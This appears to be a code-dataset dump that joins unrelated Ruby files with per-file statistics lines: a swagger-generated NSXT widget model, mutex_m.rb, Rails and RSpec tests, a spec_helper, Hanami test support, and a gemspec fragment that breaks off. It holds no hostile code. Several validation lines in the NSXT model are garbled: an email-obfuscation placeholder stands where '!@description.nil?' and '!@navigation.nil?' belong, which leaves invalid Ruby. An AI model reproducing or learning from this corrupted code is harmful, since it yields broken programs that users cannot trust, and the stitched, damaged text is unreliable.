:'properties' => :'properties'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'_self' => :'SelfResourceLink',
:'_links' => :'Array<ResourceLink>',
:'_schema' => :'String',
:'_revision' => :'Integer',
:'_system_owned' => :'BOOLEAN',
:'display_name' => :'String',
:'description' => :'String',
:'tags' => :'Array<Tag>',
:'_create_user' => :'String',
:'_protection' => :'String',
:'_create_time' => :'Integer',
:'_last_modified_time' => :'Integer',
:'_last_modified_user' => :'String',
:'id' => :'String',
:'resource_type' => :'String',
:'datasources' => :'Array<Datasource>',
:'weight' => :'Integer',
:'icons' => :'Array<Icon>',
:'shared' => :'BOOLEAN',
:'footer' => :'Footer',
:'drilldown_id' => :'String',
:'is_drilldown' => :'BOOLEAN',
:'legend' => :'Legend',
:'layout' => :'Layout',
:'navigation' => :'String',
:'sub_type' => :'String',
:'properties' => :'Array<PropertyItem>'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'_self')
self._self = attributes[:'_self']
end
if attributes.has_key?(:'_links')
if (value = attributes[:'_links']).is_a?(Array)
self._links = value
end
end
if attributes.has_key?(:'_schema')
self._schema = attributes[:'_schema']
end
if attributes.has_key?(:'_revision')
self._revision = attributes[:'_revision']
end
if attributes.has_key?(:'_system_owned')
self._system_owned = attributes[:'_system_owned']
end
if attributes.has_key?(:'display_name')
self.display_name = attributes[:'display_name']
end
if attributes.has_key?(:'description')
self.description = attributes[:'description']
end
if attributes.has_key?(:'tags')
if (value = attributes[:'tags']).is_a?(Array)
self.tags = value
end
end
if attributes.has_key?(:'_create_user')
self._create_user = attributes[:'_create_user']
end
if attributes.has_key?(:'_protection')
self._protection = attributes[:'_protection']
end
if attributes.has_key?(:'_create_time')
self._create_time = attributes[:'_create_time']
end
if attributes.has_key?(:'_last_modified_time')
self._last_modified_time = attributes[:'_last_modified_time']
end
if attributes.has_key?(:'_last_modified_user')
self._last_modified_user = attributes[:'_last_modified_user']
end
if attributes.has_key?(:'id')
self.id = attributes[:'id']
end
if attributes.has_key?(:'resource_type')
self.resource_type = attributes[:'resource_type']
end
if attributes.has_key?(:'datasources')
if (value = attributes[:'datasources']).is_a?(Array)
self.datasources = value
end
end
if attributes.has_key?(:'weight')
self.weight = attributes[:'weight']
end
if attributes.has_key?(:'icons')
if (value = attributes[:'icons']).is_a?(Array)
self.icons = value
end
end
if attributes.has_key?(:'shared')
self.shared = attributes[:'shared']
end
if attributes.has_key?(:'footer')
self.footer = attributes[:'footer']
end
if attributes.has_key?(:'drilldown_id')
self.drilldown_id = attributes[:'drilldown_id']
end
if attributes.has_key?(:'is_drilldown')
self.is_drilldown = attributes[:'is_drilldown']
else
self.is_drilldown = false
end
if attributes.has_key?(:'legend')
self.legend = attributes[:'legend']
end
if attributes.has_key?(:'layout')
self.layout = attributes[:'layout']
end
if attributes.has_key?(:'navigation')
self.navigation = attributes[:'navigation']
end
if attributes.has_key?(:'sub_type')
self.sub_type = attributes[:'sub_type']
end
if attributes.has_key?(:'properties')
if (value = attributes[:'properties']).is_a?(Array)
self.properties = value
end
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if !@display_name.nil? && @display_name.to_s.length > 255
invalid_properties.push('invalid value for "display_name", the character length must be smaller than or equal to 255.')
end
if [email protected]? && @description.to_s.length > 1024
invalid_properties.push('invalid value for "description", the character length must be smaller than or equal to 1024.')
end
if @resource_type.nil?
invalid_properties.push('invalid value for "resource_type", resource_type cannot be nil.')
end
if @resource_type.to_s.length > 255
invalid_properties.push('invalid value for "resource_type", the character length must be smaller than or equal to 255.')
end
if !@drilldown_id.nil? && @drilldown_id.to_s.length > 255
invalid_properties.push('invalid value for "drilldown_id", the character length must be smaller than or equal to 255.')
end
if [email protected]? && @navigation.to_s.length > 1024
invalid_properties.push('invalid value for "navigation", the character length must be smaller than or equal to 1024.')
end
if @properties.nil?
invalid_properties.push('invalid value for "properties", properties cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if !@display_name.nil? && @display_name.to_s.length > 255
return false if [email protected]? && @description.to_s.length > 1024
return false if @resource_type.nil?
resource_type_validator = EnumAttributeValidator.new('String', ['LabelValueConfiguration', 'DonutConfiguration', 'MultiWidgetConfiguration', 'ContainerConfiguration', 'StatsConfiguration', 'GridConfiguration', 'GraphConfiguration'])
return false unless resource_type_validator.valid?(@resource_type)
return false if @resource_type.to_s.length > 255
return false if !@drilldown_id.nil? && @drilldown_id.to_s.length > 255
return false if [email protected]? && @navigation.to_s.length > 1024
sub_type_validator = EnumAttributeValidator.new('String', ['VERTICALLY_ALIGNED'])
return false unless sub_type_validator.valid?(@sub_type)
return false if @properties.nil?
true
end
# Custom attribute writer method with validation
# @param [Object] display_name Value to be assigned
def display_name=(display_name)
if !display_name.nil? && display_name.to_s.length > 255
fail ArgumentError, 'invalid value for "display_name", the character length must be smaller than or equal to 255.'
end
@display_name = display_name
end
# Custom attribute writer method with validation
# @param [Object] description Value to be assigned
def description=(description)
if !description.nil? && description.to_s.length > 1024
fail ArgumentError, 'invalid value for "description", the character length must be smaller than or equal to 1024.'
end
@description = description
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] resource_type Object to be assigned
def resource_type=(resource_type)
validator = EnumAttributeValidator.new('String', ['LabelValueConfiguration', 'DonutConfiguration', 'MultiWidgetConfiguration', 'ContainerConfiguration', 'StatsConfiguration', 'GridConfiguration', 'GraphConfiguration'])
unless validator.valid?(resource_type)
fail ArgumentError, "invalid value for \"resource_type\", must be one of #{validator.allowable_values}."
end
@resource_type = resource_type
end
# Custom attribute writer method with validation
# @param [Object] drilldown_id Value to be assigned
def drilldown_id=(drilldown_id)
if !drilldown_id.nil? && drilldown_id.to_s.length > 255
fail ArgumentError, 'invalid value for "drilldown_id", the character length must be smaller than or equal to 255.'
end
@drilldown_id = drilldown_id
end
# Custom attribute writer method with validation
# @param [Object] navigation Value to be assigned
def navigation=(navigation)
if !navigation.nil? && navigation.to_s.length > 1024
fail ArgumentError, 'invalid value for "navigation", the character length must be smaller than or equal to 1024.'
end
@navigation = navigation
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] sub_type Object to be assigned
def sub_type=(sub_type)
validator = EnumAttributeValidator.new('String', ['VERTICALLY_ALIGNED'])
unless validator.valid?(sub_type)
fail ArgumentError, "invalid value for \"sub_type\", must be one of #{validator.allowable_values}."
end
@sub_type = sub_type
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
_self == o._self &&
_links == o._links &&
_schema == o._schema &&
_revision == o._revision &&
_system_owned == o._system_owned &&
display_name == o.display_name &&
description == o.description &&
tags == o.tags &&
_create_user == o._create_user &&
_protection == o._protection &&
_create_time == o._create_time &&
_last_modified_time == o._last_modified_time &&
_last_modified_user == o._last_modified_user &&
id == o.id &&
resource_type == o.resource_type &&
datasources == o.datasources &&
weight == o.weight &&
icons == o.icons &&
shared == o.shared &&
footer == o.footer &&
drilldown_id == o.drilldown_id &&
is_drilldown == o.is_drilldown &&
legend == o.legend &&
layout == o.layout &&
navigation == o.navigation &&
sub_type == o.sub_type &&
properties == o.properties
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[_self, _links, _schema, _revision, _system_owned, display_name, description, tags, _create_user, _protection, _create_time, _last_modified_time, _last_modified_user, id, resource_type, datasources, weight, icons, shared, footer, drilldown_id, is_drilldown, legend, layout, navigation, sub_type, properties].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = NSXT.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 35.554404 | 508 | 0.642816 |
21d828523ed3922e30e1be2f8bfd5426703874d5 | 1,491 | #
# mutex_m.rb -
# $Release Version: 3.0$
# $Revision: 1.7 $
# Original from mutex.rb
# by Keiju ISHITSUKA([email protected])
# modified by matz
# patched by akira yamada
#
# --
# Usage:
# require "mutex_m.rb"
# obj = Object.new
# obj.extend Mutex_m
# ...
# extended object can be handled like Mutex
# or
# class Foo
# include Mutex_m
# ...
# end
# obj = Foo.new
# this obj can be handled like Mutex
#
require 'thread'
module Mutex_m
def Mutex_m.define_aliases(cl)
cl.module_eval %q{
alias locked? mu_locked?
alias lock mu_lock
alias unlock mu_unlock
alias try_lock mu_try_lock
alias synchronize mu_synchronize
}
end
def Mutex_m.append_features(cl)
super
define_aliases(cl) unless cl.instance_of?(Module)
end
def Mutex_m.extend_object(obj)
super
obj.mu_extended
end
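# Called when an object is extended with Mutex_m: defines the un-prefixed
# aliases on the singleton class unless they already exist, then creates the
# underlying Mutex via mu_initialize.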
def mu_extended
unless (defined? locked? and
defined? lock and
defined? unlock and
defined? try_lock and
defined? synchronize)
Mutex_m.define_aliases(class<<self;self;end)
end
mu_initialize
end
# locking
def mu_synchronize(&block)
@_mutex.synchronize(&block)
end
def mu_locked?
@_mutex.locked?
end
def mu_try_lock
@_mutex.try_lock
end
def mu_lock
@_mutex.lock
end
def mu_unlock
@_mutex.unlock
end
private
def mu_initialize
@_mutex = Mutex.new
end
def initialize(*args)
mu_initialize
super
end
end
| 16.206522 | 53 | 0.652582 |
7a400005aec8d55bec89146116b700daea685556 | 1,606 | # frozen_string_literal: true
require 'test_helper'
class UsersSignupTest < ActionDispatch::IntegrationTest
test 'unsuccessful signup does not create a new user' do
get signup_path
assert_no_difference 'User.count' do
post signup_path, params: { user: { name: '',
email: '',
password: '',
password_confirmation: '' } }
end
assert_select 'h1', text: 'Sign up'
assert_select 'div.field_with_errors'
User.new.errors.full_messages.each do |message|
assert_select 'div#error_explanation li', text: message
end
assert_select 'div.alert-danger'
end
test 'error messages display and are accurate' do
get signup_path
user = User.new(name: '', email: '', password: '', password_confirmation: '')
user.valid?
assert user.errors.messages.values_at(:name, :email, :password_confirmation, :password)
# assert_select 'div#error_explanation li', text: "attribute: name, message: "
end
test 'successful signup creates a new user' do
get signup_path
assert_difference 'User.count', 1 do
post users_path, params: { user: { name: "Example User",
email: "[email protected]",
password: "password",
password_confirmation: "password" } }
end
assert_redirected_to user_path(User.last.id)
assert_equal "Welcome to the Sample App!", flash[:success]
assert is_logged_in?
end
end
| 37.348837 | 91 | 0.5934 |
61e504b3c7443949a99b9faec5dc8c5bda80c5a6 | 315 | # frozen_string_literal: true
require "rails_helper"
module Renalware
describe System::Country, type: :model do
it :aggregate_failures do
is_expected.to validate_presence_of(:name)
is_expected.to validate_presence_of(:alpha2)
is_expected.to validate_presence_of(:alpha3)
end
end
end
| 22.5 | 50 | 0.752381 |
389d6f08f65184acf903808bacc8c5680d2c540f | 285 | class StaticPagesController < ApplicationController
def home
if logged_in?
@micropost = current_user.microposts.build
@feed_items = current_user.feed.paginate(page: params[:page])
end
end
def help
end
def about
end
def contact
end
end
| 14.25 | 67 | 0.673684 |
e29f740760b761820a636addf09a529902fbb3cb | 6,183 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe JabberAdmin do
describe '.configuration' do
it 'return a new instance of JabberAdmin::Configuration' do
expect(described_class.configuration).to be_a(JabberAdmin::Configuration)
end
it 'memorizes the configuration instance' do
conf = described_class.configuration
expect(described_class.configuration).to be(conf)
end
end
describe '.configure' do
it 'yields the configuration object' do
conf = described_class.configuration
expect { |block| described_class.configure(&block) }.to \
yield_with_args(conf)
end
it 'saves the new configuration values' do
described_class.configure do |config|
config.url = 'https://jabber.local/api'
end
expect(described_class.configuration.url).to \
eq('https://jabber.local/api')
end
end
describe '.method_missing' do
before do
allow(JabberAdmin::ApiCall).to receive(:perform)
allow(JabberAdmin::ApiCall).to receive(:perform!)
end
context 'with predefined commands' do
context 'with bang' do
it 'passes the arguments down to the API call' do
expect(JabberAdmin::ApiCall).to \
receive(:perform!).once.with('unregister', check_res_body: false,
user: 'tom',
host: 'jabber.local')
described_class.unregister!(user: '[email protected]')
end
it 'passes no arguments when none are given' do
expect(JabberAdmin::ApiCall).to \
receive(:perform!).once.with('restart')
described_class.restart!
end
it 'passes no block when one is given' do
expect(JabberAdmin::ApiCall).to \
receive(:perform!).once.with('restart')
described_class.restart! { true }
end
end
context 'without bang' do
it 'passes the arguments down to the API call' do
expect(JabberAdmin::ApiCall).to \
receive(:perform).once.with('unregister', check_res_body: false,
user: 'tom',
host: 'jabber.local')
described_class.unregister(user: '[email protected]')
end
it 'passes no arguments when none are given' do
expect(JabberAdmin::ApiCall).to \
receive(:perform).once.with('restart')
described_class.restart
end
it 'passes no block when one is given' do
expect(JabberAdmin::ApiCall).to \
receive(:perform).once.with('restart')
described_class.restart { true }
end
end
end
context 'without predefined commands' do
context 'with bang' do
it 'passes the arguments down to the API call' do
expect(JabberAdmin::ApiCall).to \
receive(:perform!).once.with('unknown', user: 'Tom')
described_class.unknown!(user: 'Tom')
end
it 'passes no arguments when none are given' do
expect(JabberAdmin::ApiCall).to \
receive(:perform!).once.with('unknown')
described_class.unknown!
end
it 'passes no block when one is given' do
expect(JabberAdmin::ApiCall).to \
receive(:perform!).once.with('unknown')
described_class.unknown! { true }
end
end
context 'without bang' do
it 'passes the arguments down to the API call' do
expect(JabberAdmin::ApiCall).to \
receive(:perform).once.with('unknown', user: 'Tom')
described_class.unknown(user: 'Tom')
end
it 'passes no arguments when none are given' do
expect(JabberAdmin::ApiCall).to \
receive(:perform).once.with('unknown')
described_class.unknown
end
it 'passes no block when one is given' do
expect(JabberAdmin::ApiCall).to \
receive(:perform).once.with('unknown')
described_class.unknown { true }
end
end
end
end
describe '.predefined_command' do
it 'raises a NameError in case the given command is not known' do
expect { described_class.predefined_command('unknown') }.to \
raise_error(NameError)
end
it 'returns the class constant when the given command is known' do
expect(described_class.predefined_command('restart')).to \
be(JabberAdmin::Commands::Restart)
end
it 'can deal with bang-versions' do
expect(described_class.predefined_command('restart!')).to \
be(JabberAdmin::Commands::Restart)
end
end
describe '.predefined_callable' do
before do
allow(JabberAdmin::ApiCall).to receive(:perform)
allow(JabberAdmin::ApiCall).to receive(:perform!)
end
it 'builds a working wrapper for a bang version' do
expect(JabberAdmin::ApiCall).to receive(:perform!).once
described_class.predefined_callable('unknown!').call
end
it 'builds a working wrapper for a non-bang version' do
expect(JabberAdmin::ApiCall).to receive(:perform).once
described_class.predefined_callable('unknown').call
end
it 'passes down arguments' do
args = { user: 'Tom', room: 'Basement' }
expect(JabberAdmin::ApiCall).to receive(:perform).once.with(*args)
described_class.predefined_callable('unknown').call(*args)
end
end
describe '.respond_to?' do
context 'with predefined commands' do
it 'responds to commands with bang' do
expect(described_class.respond_to?(:register!)).to eq(true)
end
it 'responds to commands without bang' do
expect(described_class.respond_to?(:register)).to eq(true)
end
end
context 'without predefined commands' do
it 'responds to commands with bang' do
expect(described_class.respond_to?(:unknown!)).to eq(true)
end
it 'responds to commands without bang' do
expect(described_class.respond_to?(:unknown)).to eq(true)
end
end
end
end
| 32.542105 | 79 | 0.617014 |
ff7df439805ae185cb29f8998c57f2747e71e5aa | 4,502 | # This file was generated by the `rspec --init` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause this
# file to always be loaded, without a need to explicitly require it in any files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need it.
#
# The `.rspec` file also contains a few flags that are not defaults but that
# users commonly want.
#
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
RSpec.configure do |config|
# rspec-expectations config goes here. You can use an alternate
# assertion/expectation library such as wrong or the stdlib/minitest
# assertions if you prefer.
config.expect_with :rspec do |expectations|
# This option will default to `true` in RSpec 4. It makes the `description`
# and `failure_message` of custom matchers include text for helper methods
# defined using `chain`, e.g.:
# be_bigger_than(2).and_smaller_than(4).description
# # => "be bigger than 2 and smaller than 4"
# ...rather than:
# # => "be bigger than 2"
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
# rspec-mocks config goes here. You can use an alternate test double
# library (such as bogus or mocha) by changing the `mock_with` option here.
config.mock_with :rspec do |mocks|
# Prevents you from mocking or stubbing a method that does not exist on
# a real object. This is generally recommended, and will default to
# `true` in RSpec 4.
mocks.verify_partial_doubles = true
end
# Use color in STDOUT
config.color = true
# Use color not only in STDOUT but also in pagers and files
config.tty = true
# Use the specified formatter
config.formatter = :documentation # :progress, :html, :textmate
# The settings below are suggested to provide a good initial experience
# with RSpec, but feel free to customize to your heart's content.
=begin
# These two settings work together to allow you to limit a spec run
# to individual examples or groups you care about by tagging them with
# `:focus` metadata. When nothing is tagged with `:focus`, all examples
# get run.
config.filter_run :focus
config.run_all_when_everything_filtered = true
# Limits the available syntax to the non-monkey patched syntax that is recommended.
# For more details, see:
# - http://myronmars.to/n/dev-blog/2012/06/rspecs-new-expectation-syntax
# - http://teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
# - http://myronmars.to/n/dev-blog/2014/05/notable-changes-in-rspec-3#new__config_option_to_disable_rspeccore_monkey_patching
config.disable_monkey_patching!
# This setting enables warnings. It's recommended, but in some cases may
# be too noisy due to issues in dependencies.
config.warnings = true
# Many RSpec users commonly either run the entire suite or an individual
# file, and it's useful to allow more verbose output when running an
# individual spec file.
if config.files_to_run.one?
# Use the documentation formatter for detailed output,
# unless a formatter has already been configured
# (e.g. via a command-line flag).
config.default_formatter = 'doc'
end
# Print the 10 slowest examples and example groups at the
# end of the spec run, to help surface which specs are running
# particularly slow.
config.profile_examples = 10
# Run specs in random order to surface order dependencies. If you find an
# order dependency and want to debug it, you can fix the order by providing
# the seed, which is printed after each run.
# --seed 1234
config.order = :random
# Seed global randomization in this process using the `--seed` CLI option.
# Setting this allows you to use `--seed` to deterministically reproduce
# test failures related to randomization by passing the same `--seed` value
# as the one that triggered the failure.
Kernel.srand config.seed
=end
end
require "pry-byebug"
require "./lib/thread_kit" | 44.574257 | 129 | 0.742781 |
088a3897d58c4aa82d4557ebedd0330371763aee | 9,727 | require_relative "../../aws_refresher_spec_common"
require_relative "../../aws_refresher_spec_counts"
describe ManageIQ::Providers::Amazon::CloudManager::Refresher do
include AwsRefresherSpecCommon
include AwsRefresherSpecCounts
before(:each) do
@ems = FactoryGirl.create(:ems_amazon_with_vcr_authentication, :provider_region => "us-west-1")
end
AwsRefresherSpecCommon::ALL_OLD_REFRESH_SETTINGS.each do |settings|
context "with settings #{settings}" do
before(:each) do
stub_refresh_settings(settings)
end
it "will perform a full refresh on another region" do
2.times do # Run twice to verify that a second run with existing data does not change anything
@ems.reload
VCR.use_cassette("#{described_class.name.underscore}_other_region") do
EmsRefresh.refresh(@ems)
EmsRefresh.refresh(@ems.network_manager)
EmsRefresh.refresh(@ems.ebs_storage_manager)
@ems.reload
assert_counts(table_counts_from_api)
end
assert_specific_flavor
assert_specific_az
assert_specific_floating_ip
assert_specific_key_pair
assert_specific_security_group
assert_specific_template
assert_specific_vm_powered_on
assert_specific_vm_in_other_region
assert_relationship_tree
assert_subnet_required
end
end
end
def table_counts_from_api
counts = super
counts[:network_router] = 0 # We do not collect NetworkRouters in old refresh
      # Old refresh can't fetch some images; those will have a missing operating_system
counts[:operating_system] = counts[:operating_system] - Vm.all.select { |x| x.genealogy_parent.nil? }.count
counts
end
end
def assert_specific_flavor
@flavor = ManageIQ::Providers::Amazon::CloudManager::Flavor.where(:name => "t1.micro").first
expect(@flavor).to have_attributes(
:name => "t1.micro",
:description => "T1 Micro",
:enabled => true,
:cpus => 1,
:cpu_cores => 1,
:memory => 0.613.gigabytes.to_i,
:supports_32_bit => true,
:supports_64_bit => true,
:supports_hvm => false,
:supports_paravirtual => true
)
expect(@flavor.ext_management_system).to eq(@ems)
end
def assert_specific_az
@az = ManageIQ::Providers::Amazon::CloudManager::AvailabilityZone.where(:name => "us-west-1a").first
expect(@az).to have_attributes(
:name => "us-west-1a",
)
end
def assert_specific_floating_ip
ip = ManageIQ::Providers::Amazon::NetworkManager::FloatingIp.where(:address => "54.215.0.230").first
expect(ip).to have_attributes(
:address => "54.215.0.230",
:ems_ref => "54.215.0.230",
:cloud_network_only => false
)
@ip = ManageIQ::Providers::Amazon::NetworkManager::FloatingIp.where(:address => "204.236.137.154").first
expect(@ip).to have_attributes(
:address => "204.236.137.154",
:ems_ref => "204.236.137.154",
:fixed_ip_address => "10.191.129.95",
:cloud_network_only => false
)
end
def assert_specific_key_pair
@kp = ManageIQ::Providers::Amazon::CloudManager::AuthKeyPair.where(:name => "EmsRefreshSpec-KeyPair-OtherRegion").first
expect(@kp).to have_attributes(
:name => "EmsRefreshSpec-KeyPair-OtherRegion",
:fingerprint => "fc:53:30:aa:d2:23:c7:8d:e2:e8:05:95:a0:d2:90:fb:15:30:a2:51"
)
end
def assert_specific_security_group
@sg = ManageIQ::Providers::Amazon::NetworkManager::SecurityGroup.where(:name => "EmsRefreshSpec-SecurityGroup-OtherRegion").first
expect(@sg).to have_attributes(
:name => "EmsRefreshSpec-SecurityGroup-OtherRegion",
:description => "EmsRefreshSpec-SecurityGroup-OtherRegion",
:ems_ref => "sg-2b87746f"
)
expect(@sg.firewall_rules.size).to eq(1)
expect(@sg.firewall_rules.first).to have_attributes(
:host_protocol => "TCP",
:direction => "inbound",
:port => 0,
:end_port => 65535,
:source_security_group_id => nil,
:source_ip_range => "0.0.0.0/0"
)
end
def assert_specific_template
@template = ManageIQ::Providers::Amazon::CloudManager::Template.where(:name => "EmsRefreshSpec-Image-OtherRegion").first
expect(@template).to have_attributes(
:template => true,
:ems_ref => "ami-183e175d",
:ems_ref_obj => nil,
:uid_ems => "ami-183e175d",
:vendor => "amazon",
:power_state => "never",
:location => "200278856672/EmsRefreshSpec-Image-OtherRegion",
:tools_status => nil,
:boot_time => nil,
:standby_action => nil,
:connection_state => nil,
:cpu_affinity => nil,
:memory_reserve => nil,
:memory_reserve_expand => nil,
:memory_limit => nil,
:memory_shares => nil,
:memory_shares_level => nil,
:cpu_reserve => nil,
:cpu_reserve_expand => nil,
:cpu_limit => nil,
:cpu_shares => nil,
:cpu_shares_level => nil
)
expect(@template.ext_management_system).to eq(@ems)
expect(@template.operating_system).to(
have_attributes(
:product_name => "linux_generic",
)
)
expect(@template.custom_attributes.size).to eq(0)
expect(@template.snapshots.size).to eq(0)
expect(@template.hardware).to have_attributes(
:guest_os => "linux_generic",
:guest_os_full_name => nil,
:bios => nil,
:annotation => nil,
:cpu_sockets => 1, # wtf
:memory_mb => nil,
:disk_capacity => nil,
:bitness => 64
)
expect(@template.hardware.disks.size).to eq(0)
expect(@template.hardware.guest_devices.size).to eq(0)
expect(@template.hardware.nics.size).to eq(0)
expect(@template.hardware.networks.size).to eq(0)
end
def assert_specific_vm_powered_on
v = ManageIQ::Providers::Amazon::CloudManager::Vm.where(:name => "EmsRefreshSpec-PoweredOn-OtherRegion", :raw_power_state => "running").first
expect(v).to have_attributes(
:template => false,
:ems_ref => "i-dc1ee486",
:ems_ref_obj => nil,
:uid_ems => "i-dc1ee486",
:vendor => "amazon",
:power_state => "on",
:location => "ec2-204-236-137-154.us-west-1.compute.amazonaws.com",
:tools_status => nil,
:boot_time => Time.zone.parse("2013-08-31T00:12:43.000"),
:standby_action => nil,
:connection_state => nil,
:cpu_affinity => nil,
:memory_reserve => nil,
:memory_reserve_expand => nil,
:memory_limit => nil,
:memory_shares => nil,
:memory_shares_level => nil,
:cpu_reserve => nil,
:cpu_reserve_expand => nil,
:cpu_limit => nil,
:cpu_shares => nil,
:cpu_shares_level => nil
)
expect(v.ext_management_system).to eq(@ems)
expect(v.availability_zone).to eq(@az)
expect(v.floating_ip).to eq(@ip)
expect(v.flavor).to eq(@flavor)
expect(v.cloud_network).to be_nil
expect(v.cloud_subnet).to be_nil
expect(v.security_groups).to eq([@sg])
expect(v.key_pairs).to eq([@kp])
expect(v.operating_system).to(
have_attributes(
:product_name => "linux_generic",
)
)
expect(v.custom_attributes.size).to eq(1)
expect(v.snapshots.size).to eq(0)
expect(v.hardware).to have_attributes(
:guest_os => "linux_generic",
:guest_os_full_name => nil,
:bios => nil,
:annotation => nil,
:cpu_sockets => 1,
:memory_mb => 627,
:disk_capacity => 0, # TODO: Change to a flavor that has disks
:bitness => 64
)
expect(v.hardware.disks.size).to eq(1) # TODO: Change to a flavor that has disks
expect(v.hardware.guest_devices.size).to eq(0)
expect(v.hardware.nics.size).to eq(0)
expect(v.hardware.networks.size).to eq(2)
network = v.hardware.networks.where(:description => "public").first
expect(network).to have_attributes(
:description => "public",
:ipaddress => "204.236.137.154",
:hostname => "ec2-204-236-137-154.us-west-1.compute.amazonaws.com"
)
network = v.hardware.networks.where(:description => "private").first
expect(network).to have_attributes(
:description => "private",
:ipaddress => "10.191.129.95",
:hostname => "ip-10-191-129-95.us-west-1.compute.internal"
)
v.with_relationship_type("genealogy") do
expect(v.parent).to eq(@template)
end
end
def assert_specific_vm_in_other_region
v = ManageIQ::Providers::Amazon::CloudManager::Vm.where(:name => "EmsRefreshSpec-PoweredOn-Basic").first
expect(v).to be_nil
end
def assert_relationship_tree
expect(@ems.descendants_arranged).to match_relationship_tree({})
end
def assert_subnet_required
@flavor = ManageIQ::Providers::Amazon::CloudManager::Flavor.where(:name => "t2.small").first
expect(@flavor).to have_attributes(:cloud_subnet_required => true)
end
end
| 36.430712 | 145 | 0.599157 |
ab56d726d45054beabea4f89af72bf9c042e467b | 1,500 | # frozen_string_literal: true
require "hanami/devtools/integration/files"
require "hanami/devtools/integration/with_tmp_directory"
RSpec.shared_context "Application integration" do
let(:application_modules) { %i[TestApp Main] }
end
RSpec.configure do |config|
config.include RSpec::Support::Files, :application_integration
config.include RSpec::Support::WithTmpDirectory, :application_integration
config.include_context "Application integration", :application_integration
config.before :each, :application_integration do
@load_paths = $LOAD_PATH.dup
application_modules.each do |app_module|
Object.const_set(app_module, Module.new { |m| m.extend(TestNamespace) })
end
end
config.after :each, :application_integration do
# Tear down Zeitwerk (from zeitwerk's own test/support/loader_test)
Zeitwerk::Registry.loaders.each(&:unload)
Zeitwerk::Registry.loaders.clear
Zeitwerk::Registry.loaders_managing_gems.clear
Zeitwerk::ExplicitNamespace.cpaths.clear
Zeitwerk::ExplicitNamespace.tracer.disable
$LOAD_PATH.replace(@load_paths)
$LOADED_FEATURES.delete_if do |feature_path|
feature_path =~ %r{hanami/(setup|init|boot)}
end
application_modules.each do |app_module|
Object.const_get(app_module).remove_constants
Object.send :remove_const, app_module
end
%i[@_application @_app].each do |ivar|
Hanami.remove_instance_variable(ivar) if Hanami.instance_variable_defined?(ivar)
end
end
end
| 32.608696 | 86 | 0.762667 |
019e156a56d428ae79add12d720d58a7f24f7b3f | 2,158 | # Copyright (C) The Arvados Authors. All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
if not File.exist?('/usr/bin/git') then
STDERR.puts "\nGit binary not found, aborting. Please install git and run gem build from a checked out copy of the git repository.\n\n"
exit
end
git_dir = ENV["GIT_DIR"]
git_work = ENV["GIT_WORK_TREE"]
begin
ENV["GIT_DIR"] = File.expand_path "#{__dir__}/../../.git"
ENV["GIT_WORK_TREE"] = File.expand_path "#{__dir__}/../.."
